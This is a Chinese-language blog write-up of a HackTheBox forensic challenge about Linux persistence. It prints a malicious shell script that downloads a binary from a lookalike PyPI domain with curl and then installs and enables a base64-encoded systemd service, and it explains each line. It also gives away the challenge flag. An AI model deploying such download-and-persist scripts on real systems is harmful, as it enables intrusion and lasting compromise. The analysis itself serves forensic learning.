HackTheBox-Forensic—Extraterrestrial Persistence #Linux

已于 2023-12-16 09:50:36 修改
阅读量41 收藏
点赞数
文章标签: linux java 服务器
于 2023-12-05 17:25:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39974634/article/details/134811612
版权

Linux持久化

分析persistence.sh  解压密码是hackthebox

n=`whoami`
h=`hostname`
path='/usr/local/bin/service'
if [[ "$n" != "pandora" && "$h" != "linux_HQ" ]]; then exit; fi

curl https://files.pypi-install.com/packeges/service -o $path

chmod +x $path

echo -e "W1VuaXRdCkRlc2NyaXB0aW9uPUhUQnt0aDNzM180bDEzblNfNHIzX3MwMDAwMF9iNHMxY30KQWZ0ZXI9bmV0d29yay50YXJnZXQgbmV0d29yay1vbmxpbmUudGFyZ2V0CgpbU2VydmljZV0KVHlwZT1vbmVzaG90ClJlbWFpbkFmdGVyRXhpdD15ZXMKCkV4ZWNTdGFydD0vdXNyL2xvY2FsL2Jpbi9zZXJ2aWNlCkV4ZWNTdG9wPS91c3IvbG9jYWwvYmluL3NlcnZpY2UKCltJbnN0YWxsXQpXYW50ZWRCeT1tdWx0aS11c2VyLnRhcmdldA=="|base64 --decode > /usr/lib/systemd/system/service.service

systemctl enable service.service

解释:在满足特定条件下的linux系统上安装一个名为service的服务

如果whoami和hostname不满足条件则退出

curl 文件到之前定义的path路径下

echo -e是激活转义字符  从而使得\n生效

丢到hiencode解码

systemd启用解码

base64解码如下

[]是systemd的语法规定,用于规定节的开始和结束 一般都会有 关于服务的一般性描述和依赖关系

[Unit]   
Description=HTB{th3s3_4l13nS_4r3_s00000_b4s1c} #描述  也是flag   
After=network.target network-online.target   #在什么条件下 在网络连通之后

[Service]  # 如何启动停止和管理服务
Type=oneshot    #一次性执行的服务  执行完就退出
RemainAfterExit=yes  #主要进程已经退出,也继续保持服务状态

ExecStart=/usr/local/bin/service #服务开始时执行的命令
ExecStop=/usr/local/bin/service #服务停止时执行的命令

[Install]  #定义服务与系统目标之间的关联以及启用或禁用服务时的行为
WantedBy=multi-user.target   #在multi-user.target启动时自动启动

行者孙Sun
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
EnCase-Forensic取证软件完整版资料.ppt
11-14
EnCase-Forensic取证软件完整版资料 EnCase Forensic是Guidance Software公司开发的一款计算机取证软件,旨在提供计算机犯罪取证的全面解决方案。该软件提供实时预览、分析和获取,符合美国立法规范,全球最大的...
开源项目-esimov-forensic.zip
09-03
开源项目“esimov-forensic”是一个专门用于图像伪造检测的库,它为开发者和数字取证专家提供了强大的工具来鉴别图像的真伪。在现代数字时代,图像篡改技术日益普及,使得真实与虚假之间的界限变得模糊。这个库的...
HackTheBox-Forensic— Red Miners #Linux
weixin_39974634的博客
12-05 51
cronCleanUp 删除原有的计划任务,contab -l 可以列举 用sed去掉之后 crontab编辑 将修改内容保存。cleanEnv这个函数把环境中阻碍挖矿的进程杀掉,还会检查其他挖矿的行为,如果有的话也会杀掉。flag的四个部分通过搜索 == 或者"base64 -d"可以找到,经过拼接,得到最后的结果。给了一个miner.zip里面是一个installer_miner.sh的挖矿文件。
HackTheBox-Forensic— Illumination #Linux #Git
weixin_39974634的博客
12-05 141
从config变量可以看到,从config.json读取了文件,解析token后进行login操作。根据注释可见token已经被替换,因为不是base64,无法在开发/生产中正常工作。首先通过ls -la找到 .git 发现这是一个git repository。通过git show 加commit id可以看到变更记录。由于这是git库,可以通过过去的日志查看被替换之前的值。查看config.json文件。
HackTheBox-Forensic-Insider #Browser #Mozilla
weixin_39974634的博客
12-05 30
给了一个压缩包,解压出来除了Firefox以外没有内容 将在这个文件夹中查找攻击者访问的内容,这个文件夹包含了火狐浏览器需要的设置和一些信息 为了排除干扰信息,建议在系统上新建一个账户,把该文件夹复制到c:\user\xxx\appdata\local\mozilla 我们启动火狐浏览器,就会自动读取目录下profile的信息 访问历史显示了攻击者登录了acc01的8080端口,可以看到攻击者访问了 password字段显示了flag
HackTheBox-Forensic—Export #Windows #Volatility
weixin_39974634的博客
12-05 43
(iwr "http://xxxx/test.ps1"): 这是一个嵌套的命令,使用了 PowerShell 的另一个内置命令 Invoke-WebRequest(简写为 iwr)。该命令从指定的 URL 下载一个名为 test.ps1 的 PowerShell 脚本。这个命令的作用是从指定的 URL 下载一个 PowerShell 脚本,然后将其内容保存到指定的位置。如果在用户的启动目录下创建了一个这样的脚本,那么每次用户登录时,该脚本都将自动执行。先尝试pslist列出目标系统中的进程列表。
HackTheBox-Forensic-Peel Back The Layers #Linux
weixin_39974634的博客
12-06 31
在 Dockerfile 中使用 RUN rm 或类似命令删除了一个文件时,该文件实际上并没有从镜像中物理删除。它只是在一个新的层中被标记为已删除,并且上一层中的文件保持不变。这些文件仍然可以在后续的层中找到,因为它们是在上一层中存在的。我们通过 docker save 生成的 tar 文件会包含所有层,包括那些dockerfile删除了文件的层。docker history 命令同样可以查看 Docker 镜像的构建历史,包括每一层镜像创建的时间、作者、大小变化以及使用的命令等信息。
HackTheBox Forensic Reflection #Windows(更新中)test
weixin_39974634的博客
12-18 41
输出结果表示在内存中的某个地址(0x000000003f4551c0)找到了一个名为"update.ps1"的文件,其大小为8字节,权限为只读(R--r--),路径为"\Device\HarddiskVolume1\Windows\security"。-PEUrl https://windowsliveupdater.com/winmgr.dll 指定了要下载和执行的 DLL 文件的 URL('https://windowsliveupdater.com/winmgr.dll')。
【Hack The Box】windows练习-- Blackfield
人间体佐菲的博客
11-17 424
【Hack The Box】windows练习-- Blackfield
HackTheBox Forensic Reflection #Windows(更新中)
weixin_39974634的博客
12-19 315
在这个例子中,下载的是一个名为 "sysdriver.ps1" 的 PowerShell 脚本。输出结果表示在内存中的某个地址(0x000000003f4551c0)找到了一个名为"update.ps1"的文件,其大小为8字节,权限为只读(R--r--),路径为"\Device\HarddiskVolume1\Windows\security"。例如,".text" 节通常包含可执行代码,".data" 节包含初始化的数据,".rdata" 节包含只读数据等。这些导入和导出的信息都会在特定的表中记录。
探索隐秘信息世界的宝藏:Awesome-anti-forensic 开源项目
gitblog_00023的博客
05-20 409
探索隐秘信息世界的宝藏:Awesome-anti-forensic 开源项目 项目地址:https://gitcode.com/shadawck/awesome-anti-forensic 在数字世界中,数据安全和隐私保护至关重要,而反取证工具是确保这些信息安全的关键一环。【Awesome-anti-forensic】是一个精心整理的开源项目集合,它聚合了一系列用于对抗数字取证活动的工具和技术,涵...
Ubuntu-Forensic_linux_
09-30
Ubuntu operating system canconserve and manage a lot of configurationinformation and the information with forensicimportance
Cuda-OpenCL-Forensic-Tools:使用图形卡进行取证处理
05-10
Cuda / OpenCL取证工具使用图形卡进行取证处理。 开发脚本以执行简单的取证功能,例如图像,覆盖,哈希和搜索。 该脚本的核心是Python Cuda / OpenCL。 最初的目标是测试该概念的性能。 如果性能显示出价值,那么下...
The Forensic Laboratory Handbook - Procedures and Practice
06-03
If the law has made you a witness, remain a man of science. You have no victim to avenge, no guilty or innocent person to convict or save— you must bear testimony within the limits of science.
Linux日常运维小结
lza20001103的博客
08-14 588
Linux日常运维小结
系统控制和管理接口:在Linux中利用电源和性能域进行平台资源抽象
csdnsqst0046的博客
08-09 877
在本文中,您可以了解到如何利用我们的方法将复杂性从Linux驱动程序(需要为每个平台编写不同的开发程序)转移到固件。由于固件已经适配了平台,因此固件知道需要采取哪些手段来配置外设。您可以了解我们如何定义逻辑性能和电源域,而不是单独处理每个平台资源。您还可以了解到我们如何努力实现这一目标,以及您如何进行尝试并做出贡献。
Linux Day1 系统编程和文件操作
qq_63145217的博客
08-12 1034
1)使用标准库函数如fopen, fclose, fread, fwrite, fgetc, fputc, fgets, fprintf, fscanf等进行文件操作。1)用套接字(sockets)API,包括socket, bind, listen, accept, connect, send, recv等函数进行网络通信。nmemb 要写的数据块的个数(一般为sizeof(ptr))->1个1个读,到sizeof(ptr)为止。nmemb 要获取的数据块的个数,拷贝的数据块个数。
Linux中线程接口(分离,查看id)mv指令
最新发布
2301_77479435的博客
08-14 502
Linux中线程接口(分离,查看id)mv指令
SD-WAN与BYOD并存的安全挑战与反制策略
"BYOD 网络取证生态系统-研究论文" 这篇研究论文深入探讨了软件定义广域网(SD-WAN)与自带设备(BYOD)在企业中的应用及其潜在安全挑战。SD-WAN 提供了商业敏捷性,帮助企业实现数字化转型,并能够智能管理网络以...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值